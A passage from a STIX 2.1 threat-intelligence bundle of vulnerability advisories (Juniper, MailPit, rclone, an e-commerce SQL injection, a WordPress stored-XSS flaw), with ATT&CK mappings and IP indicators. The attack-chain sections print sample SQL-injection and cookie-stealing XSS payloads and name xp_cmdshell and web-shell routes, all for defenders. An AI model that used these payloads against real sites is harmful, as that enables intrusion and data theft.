prevent lateral movement.\n* Monitor Juniper device logs for unusual activity, unexpected reboots (indicating potential DoS attacks), or unauthorized configuration changes (indicating potential RCE).\n",
      "published": "2026-07-09T10:16:30Z",
      "labels": [
        "network",
        "vulnerability",
        "denial-of-service",
        "rce",
        "information-disclosure"
      ],
      "object_refs": [
        "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2257"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4a59f2b7-c072-5635-afc7-0281a0624a5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--42d2b5da-7247-53cd-b32f-9d6e45019ec8",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--42d2b5da-7247-53cd-b32f-9d6e45019ec8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "MailPit: Multiple Vulnerabilities Lead to Denial of Service",
      "description": "## Overview\n\nThe German Federal Office for Information Security (BSI) has issued an advisory regarding multiple vulnerabilities within the MailPit application. These vulnerabilities, while not detailing specific CVEs or exploit mechanisms, collectively enable an attacker to launch Denial of Service (DoS) attacks. MailPit, an email testing tool, could face service disruption, impacting development and testing workflows. This advisory, published on 2026-07-09, highlights a generic threat without indicating observed in-the-wild exploitation, but serves as a warning for users to proactively secure their instances against potential attacks.\n\n## Attack Chain\n\n(No specific attack chain details are provided in the source for these vulnerabilities, as it's a general advisory.)\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities would result in Denial of Service for MailPit instances. This means legitimate users would be unable to access or utilize the MailPit application, leading to disruptions in email testing and development processes. The advisory does not specify the number of affected instances or target sectors, but any organization relying on MailPit for critical development or testing could experience significant operational impact if their instance is compromised.\n\n## Recommendation\n\n* Apply the latest security patches and updates for all MailPit installations as soon as they become available to remediate these vulnerabilities.\n* Monitor MailPit server logs for unusual traffic patterns, excessive resource consumption (CPU, memory, network I/O), or unexpected service interruptions, which could indicate a Denial of Service attempt.\n",
      "published": "2026-07-09T10:17:06Z",
      "labels": [
        "denial-of-service",
        "vulnerability",
        "mailpit"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2256"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c5700acf-86b7-5e92-a438-7e9e0f0a5fe7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--652973bb-4fec-5cdc-ba8c-5aa8251f505b",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--652973bb-4fec-5cdc-ba8c-5aa8251f505b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-5955: Critical SQL Injection in Inrove BiEticaret",
      "description": "## Overview\n\nA severe SQL injection vulnerability, identified as CVE-2026-5955, has been discovered in Inrove Software and Internet Services' BiEticaret e-commerce platform. This flaw affects all versions of BiEticaret prior to v3.3.57. The vulnerability arises from improper neutralization of special elements in SQL commands, allowing an unauthenticated attacker to inject arbitrary SQL code into web application queries. With a CVSS v3.1 base score of 9.8 (Critical), successful exploitation can lead to a complete compromise of confidentiality, integrity, and availability of the underlying database. Attackers can bypass authentication, extract sensitive customer data, manipulate database content, and potentially achieve remote code execution on the server depending on the database configuration and privileges. Organizations utilizing BiEticaret are urged to patch immediately to prevent unauthorized access and data breaches.\n\n## Attack Chain\n\n1. **Discovery**: An attacker identifies an internet-facing instance of Inrove BiEticaret software running a vulnerable version (prior to v3.3.57).\n2. **Vulnerability Probing**: The attacker sends carefully crafted HTTP requests to various web application endpoints, systematically testing common parameters (e.g., product IDs, search queries, login fields) for SQL injection vulnerabilities using known payloads.\n3. **Authentication Bypass**: Upon identifying a susceptible parameter, the attacker injects malicious SQL statements (e.g., `' OR 1=1 --`, `' UNION SELECT NULL,password,NULL FROM users --`) to bypass login forms or other authentication mechanisms.\n4. **Information Disclosure**: With unauthorized access, the attacker leverages further SQL injection techniques to extract sensitive information from the database, including database schema, user credentials, session tokens, and other confidential application data.\n5. **Data Exfiltration**: The extracted sensitive data, such as customer records, payment details, or proprietary business information, is then systematically exfiltrated from the compromised database.\n6. **Privilege Escalation / Remote Code Execution**: If the underlying database user account has elevated privileges and the database system (e.g., Microsoft SQL Server, MySQL) is configured to allow it, the attacker may exploit functions like `xp_cmdshell` or `LOAD_FILE`/`INTO OUTFILE` to execute arbitrary operating system commands or write web shells onto the server.\n7. **Persistence**: The attacker establishes persistent access to the compromised server, potentially by deploying web shells, creating new user accounts, or modifying existing system configurations.\n8. **Impact**: The attacker maintains control over the application and underlying server for further malicious activities, including lateral movement, data tampering, or use as a C2 staging point.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-5955 grants unauthenticated attackers extensive control over the affected BiEticaret application's database. This directly leads to severe data breaches, compromising sensitive customer information, financial data, and intellectual property. Beyond data theft, attackers can manipulate critical business data, disrupt operations by tampering with product catalogs or order statuses, and potentially gain full remote code execution on the hosting server. Such compromises can result in significant financial losses, reputational damage, legal liabilities, and regulatory penalties for affected organizations. The critical CVSS score of 9.8 indicates the highest severity, signifying a complete compromise of confidentiality, integrity, and availability.\n\n## Recommendation\n\n* Immediately update Inrove BiEticaret to version v3.3.57 or newer to remediate CVE-2026-5955.\n* Deploy the Sigma rule provided in this brief to your SIEM/webserver log analysis platform to detect and alert on attempts to exploit this SQL injection vulnerability.\n* Review web application firewall (WAF) configurations to ensure robust SQL injection prevention rules are enabled and tuned for your environment, specifically looking for common SQLi patterns in URL paths and query parameters.\n* Conduct regular security audits and penetration tests on your BiEticaret instance to identify and address similar input validation vulnerabilities.\n",
      "published": "2026-07-09T10:28:47Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "critical-vulnerability",
        "data-exfiltration",
        "webserver"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5955"
        },
        {
          "source_name": "reference",
          "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0519"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--03b0f6f4-ed30-5723-9416-c81daf8e278a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0ca40e8b-9092-55f8-b2af-b99ecca132e4",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a3c6b552-adec-5512-8b02-5c270bc3adfa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0ca40e8b-9092-55f8-b2af-b99ecca132e4",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--34ced450-d7c3-56e6-a670-7a0a3f587a69",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0ca40e8b-9092-55f8-b2af-b99ecca132e4",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1567",
          "url": "https://attack.mitre.org/techniques/T1567"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ba8013f4-88cf-51b2-bc79-20687305e525",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0ca40e8b-9092-55f8-b2af-b99ecca132e4",
      "target_ref": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Inhibit System Recovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1490",
          "url": "https://attack.mitre.org/techniques/T1490"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4d71bb7c-ee1d-5eef-bdf0-94bf22183548",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0ca40e8b-9092-55f8-b2af-b99ecca132e4",
      "target_ref": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0ca40e8b-9092-55f8-b2af-b99ecca132e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "rclone: Multiple Vulnerabilities",
      "description": "## Overview\n\nThe German Federal Office for Information Security (BSI) has issued a high-severity advisory regarding multiple vulnerabilities identified in rclone, a popular open-source command-line program for managing files on cloud storage. A remote, authenticated attacker can leverage these flaws to achieve significant unauthorized access and control. The vulnerabilities enable the attacker to read and write arbitrary files on the system where rclone is installed or configured, leading to potential data manipulation or destruction. Furthermore, they can disclose sensitive information and circumvent existing security defenses. While the advisory does not specify particular CVEs or a detailed attack vector, the broad capabilities granted to an authenticated attacker highlight a critical risk to systems utilizing vulnerable versions of rclone, necessitating immediate action from defenders.\n\n## Attack Chain\n\nThe provided source describes vulnerabilities and their potential outcomes rather than a multi-stage attack chain. The exploitation steps would depend on the specific vulnerabilities, which are not detailed. An authenticated attacker, having already gained initial access or valid credentials, would leverage these flaws within the rclone application to perform the described malicious actions directly.\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities could lead to severe consequences for affected organizations. An attacker's ability to read arbitrary files can result in the exposure of sensitive data, intellectual property, or confidential user information, leading to compliance breaches and reputational damage. The capability to write arbitrary files poses a significant risk to system integrity, potentially allowing for the installation of malware, modification of critical system files, or rendering systems inoperable (e.g., via ransomware or disk wipe operations). Bypassing security mechanisms further compounds the risk by allowing attackers to evade detection and persist within compromised environments, ultimately leading to data compromise or full system takeover.\n\n## Recommendation\n\n* Prioritize and immediately update all instances of `rclone` to the latest secure version to remediate the vulnerabilities described in the BSI advisory referenced.\n* Implement strong authentication mechanisms and enforce the principle of least privilege for `rclone` users to minimize the impact of compromised credentials, as described in the `T1078` ATT\u0026CK technique.\n* Regularly review `rclone` configurations and associated access controls to prevent unauthorized file operations (reading, writing, and information disclosure), as highlighted by `T1005` and `T1567.002`.\n* Monitor system logs for unusual file access patterns or modifications that could indicate exploitation of arbitrary file write capabilities, referencing the potential for `T1490` or `T1561.002` related impact.\n",
      "published": "2026-07-09T10:53:17Z",
      "labels": [
        "vulnerability",
        "rclone",
        "data-exfiltration",
        "impact"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
        "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2266"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--73693a16-e5fa-5360-9086-0439295291d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--81e32c15-2ec5-51c8-9775-300c21399b1c",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0d3f9a89-25ff-50c0-9cf0-50a6bba2855c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--81e32c15-2ec5-51c8-9775-300c21399b1c",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--81e32c15-2ec5-51c8-9775-300c21399b1c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-9253: WordPress E\u0026P Forms Plugin Stored Cross-Site Scripting",
      "description": "## Overview\n\nThe 'WP Cost Estimation \u0026 Payment Forms Builder' (E\u0026P Forms) plugin for WordPress, specifically versions up to and including 10.5.97, contains a critical Stored Cross-Site Scripting (XSS) vulnerability, identified as CVE-2026-9253. This flaw stems from insufficient input sanitization and output escaping when handling the 'customerInfos' parameter. Unauthenticated attackers can leverage this vulnerability to inject malicious web scripts into the plugin's data, which are then stored within the WordPress site's database. When a legitimate user, such as an administrator or another visitor, accesses a page where this unsanitized data is rendered, their browser will execute the injected script. This allows for various malicious activities including session hijacking, defacement of web pages, or redirection to phishing sites, posing a significant risk to the integrity and user data of affected WordPress installations.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a WordPress site utilizing the vulnerable 'WP Cost Estimation \u0026 Payment Forms Builder' plugin (version 10.5.97 or earlier).\n2. The attacker crafts a malicious JavaScript payload (e.g., `\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`) targeting the 'customerInfos' parameter.\n3. The attacker sends an HTTP POST request to a relevant plugin endpoint (e.g., a form submission page within the plugin) with the `customerInfos` parameter containing the malicious script.\n4. Due to the plugin's inadequate input sanitization and output escaping, the WordPress site's database stores the attacker's malicious JavaScript payload.\n5. A legitimate user (e.g., site administrator or another website visitor) subsequently navigates to a WordPress page that displays or processes the compromised 'customerInfos' data.\n6. The victim's web browser receives the rendered HTML, which now includes the attacker's injected JavaScript, and executes it in the context of the vulnerable WordPress domain.\n7. The executed script can steal the user's session cookies, perform unauthorized actions on their behalf, deface the web page, or redirect the user to an attacker-controlled website.\n8. The attacker successfully compromises the victim's session or manipulates website content, potentially leading to further compromise or data exfiltration.\n\n## Impact\n\nThe successful exploitation of CVE-2026-9253 allows unauthenticated attackers to inject persistent malicious scripts into a WordPress site. This Stored XSS vulnerability can lead to severe consequences for the site and its users. Attackers can hijack user sessions, including those of administrators, granting them unauthorized access to the WordPress backend. This could result in complete website defacement, data theft from visitors, insertion of malicious content, or redirection to phishing and malware distribution sites. Any user accessing a page affected by the stored script is at risk, making this a widespread threat to organizations using the vulnerable plugin.\n\n## Recommendation\n\n* Immediately update the 'WP Cost Estimation \u0026 Payment Forms Builder' plugin to a version greater than 10.5.97 to patch CVE-2026-9253.\n* Implement a Web Application Firewall (WAF) with rules specifically designed to detect and block common Stored Cross-Site Scripting (XSS) payloads in HTTP request parameters.\n* Regularly review web server access logs for any suspicious HTTP POST requests containing script tags or common XSS patterns in parameters, particularly those related to the plugin's endpoints.\n",
      "published": "2026-07-09T12:19:14Z",
      "labels": [
        "wordpress",
        "xss",
        "web-vulnerability",
        "plugin"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9253"
        },
        {
          "source_name": "reference",
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2bf0832c-13ed-4e53-9847-d5d2110eb3f8?source=cve"
        },
        {
          "source_name": "reference",
          "url": "https://www.loopus-plugins.com/plugins/wp-cost-estimation-payments-forms"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7fca924f-9516-5b4a-a229-2daaa1d98a8b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 172.111.233.36",
      "pattern": "[ipv4-addr:value = '172.111.233.36']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T12:57:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6b58669a-d101-5a9c-a869-b8bef1827356",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "indicator--7fca924f-9516-5b4a-a229-2daaa1d98a8b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--db80c7f5-302b-54bd-b119-f0eb011e33a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 172.111.233.96",
      "pattern": "[ipv4-addr:value = '172.111.233.96']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T12:57:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--85433500-1b60-56c1-9a49-deba8b1dec79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "indicator--db80c7f5-302b-54bd-b119-f0eb011e33a7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7e720072-d259-5088-a051-240d344ef411",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 172.111.233.12",
      "pattern": "[ipv4-addr:value = '172.111.233.12']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T12:57:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f2646d12-dba6-5210-87a1-ad9eac854304",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "indicator--7e720072-d259-5088-a051-240d344ef411"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1c245bd6-a51b-54a7-93b7-830d672c34da",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 172.111.233.105",
      "pattern": "[ipv4-addr:value = '172.111.233.105']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T12:57:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e108e6d5-a692-559d-8910-6398a512682b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "indicator--1c245bd6-a51b-54a7-93b7-830d672c34da"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d7237bc5-4c91-5497-aaa4-2cf4c2abff71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 172.111.233.26",
      "pattern": "[ipv4-addr:value = '172.111.233.26']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T12:57:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9142d5b1-e565-52eb-82cd-b0f04e749c54",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "indicator--d7237bc5-4c91-5497-aaa4-2cf4c2abff71"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--886f98b0-617e-520e-bd30-861ee76bcc2b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 172.94.9.49",
      "pattern": "[ipv4-addr:value = '172.94.9.49']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T12:57:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--33e5dcee-2455-5ffc-9219-e4283d84f32b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "indicator--886f98b0-617e-520e-bd30-861ee76bcc2b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0fbd1c4f-94d3-5005-b744-aa8b3e101238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 172.94.9.43",
      "pattern": "[ipv4-addr:value = '172.94.9.43']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T12:57:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a482d1f4-46f1-5106-8d19-5b5c2ae27d71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "indicator--0fbd1c4f-94d3-5005-b744-aa8b3e101238"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e0117439-f608-50f8-b843-c81223d8dcf2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 172.94.9.19",
      "pattern": "[ipv4-addr:value = '172.94.9.19']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T12:57:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a2ca06a5-68a6-538d-b2e1-302edd0f9e3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "indicator--e0117439-f608-50f8-b843-c81223d8dcf2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ff245fe3-3ec8-5b0b-94fa-b691ed2f0f65",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 45.74.6.17",
      "pattern": "[ipv4-addr:value = '45.74.6.17']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T12:57:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3e7d6cc6-c1da-5412-9880-28e52fa7791f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "indicator--ff245fe3-3ec8-5b0b-94fa-b691ed2f0f65"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--421fdc48-a707-5b26-b24a-ac9544575a45",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 45.125.32.218",
      "pattern": "[ipv4-addr:value = '45.125.32.218']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T12:57:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7b7f3c55-8f49-56ac-bd93-bda5e5c165be",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "indicator--421fdc48-a707-5b26-b24a-ac9544575a45"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8c022814-178b-55ef-9579-7ee27541272a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 142.171.183.8",
      "pattern": "[ipv4-addr:value = '142.171.183.8']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T12:57:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6c5d5949-9b51-5cb7-8e37-27c87ca15c09",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "indicator--8c022814-178b-55ef-9579-7ee27541272a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cf6a3a73-cf9e-5870-b42c-5156f595fd6d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 193.42.25.65",
      "pattern": "[ipv4-addr:value = '193.42.25.65']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T12:57:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--23206d5e-b9d0-501b-beba-c0f07e990d89",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
      "target_ref": "indicator--cf6a3a73-cf9e-5870-b42c-5156f595fd6d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7a8736dd-a52b-5289-b016-90c7d6c76017",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 89.31.121.220",
      "pattern": "[ipv4-addr:value = '89.31.121.220']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T12:57:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7a73bfbd-d9d0-50f7-b6f6-fcfb0cebf1d9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--56a9d2af-7a1d-58e9-98fe-ef9f0144509f",
